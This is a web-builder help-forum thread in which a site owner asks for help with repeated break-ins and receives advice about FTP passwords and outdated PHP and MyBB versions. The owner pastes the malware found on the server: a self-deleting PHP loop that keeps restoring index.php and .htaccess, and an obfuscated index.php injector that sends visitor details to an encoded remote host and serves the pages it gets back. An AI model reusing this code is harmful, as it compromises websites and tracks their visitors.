WebSite X5Help Center

 
A. Pais
A. Pais
User

Hack website  en

Autor: A. Pais
Visitado 389, Seguidores 1, Compartilhado 0  

desde há cerca de 4 meses, que tenho sido hackeado todas as semanas.
já tentei apaguei toda a pasta, e apaguei os ficheiros alterados, e sempre que faço o upload dos ficheiros limpos, , passado uns dias, acontece o mesmo.
Acho que existe uma vulneberilidade em algum ficheiro, onde o hacker consegue aceder ao espaço. podem ajudar se eu vos enviar os ficheiros para análise?
Estou frustrado e já retornei ao programa antigo (website x5 evo12), uma vez que este sempre foi seguro
Podem ajudar-me?

Publicado em
10 RESPOSTAS
Claudio D.
Claudio D.
Moderator
Usuário do mês IT

what exactly do you mean by “hacked” ?


the only vulnerabilities might be in the php files if you use a deprecated version of php, but the chances are very low.


I think that :
- either you have extra code from a dubious source (counters, for example).
- or they have your ftp password.

Anyway , version 12 is more vulnerable.

Have you changed the ftp password yet ?
Do you have extra codes ?
Do you use ftps to transfer the site to the host ?

Explain well what you mean by “hacked”.



Ler mais
Publicado em de Claudio D.
Alvin L.
Alvin L.
User

Looks like you are using MyBB for your forums.  You might see if they have an upgrade.  Your hosting provider should offer the ability to block IP's.  Most likely the are coming from a short list of IP's.

Ler mais
Publicado em de Alvin L.
A. Pais
A. Pais
User
Autor

Yes, I use MyBB, but I thinks is not there. Yestarday I deactivated the Plugins, and is the same. every time i delete this 3 files, before sime time, they reapear, and my index, put witl ".old", like the print. I can share the files, they dont have virus, but someone can see what they mess.

Ler mais
Publicado em de A. Pais
Claudio D.
Claudio D.
Moderator
Usuário do mês IT

have you reset and change ftp password ?

what version of MyBB ?

what version of php ?

Ler mais
Publicado em de Claudio D.
A. Pais
A. Pais
User
Autor

I reset the ftp pass , like 5 times.

My version of MyBB is the last 1.38.

php version I can see in cpanel 7.3 (current)

Ler mais
Publicado em de A. Pais
Alvin L.
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Ler mais
Publicado em de Alvin L.
A. Pais
A. Pais
User
Autor

I will consider in the nex update of MyBB, but I think is not from there.

This is the code appear;

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in new index.php

This is the change

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Ler mais
Publicado em de A. Pais
A. Pais
A. Pais
User
Autor

OK, I think I configure the problem.
I made a search in file I.php and get some results relating with facebook. I have a code and plugin in my index, so I removed. lets see if they appear again. Hope not ;)

Ler mais
Publicado em de A. Pais
Glaucio M.
Glaucio M.
User

Amigo, problema está em seu servidor. Se for conta única, pode ter tido o FTP invadido e infiltrado algum código maligno. Maioria das vezes é invadido por ser uma hospedagem compartilhada! Cobre sua empresa responsável pela hospedagem! 

Ler mais
Publicado em de Glaucio M.
A. Pais
A. Pais
User
Autor

The problem is not the facebook plugin. I will try make a fresh MyBB install and see if the problem maintain.

I will give news.

Ler mais
Publicado em de A. Pais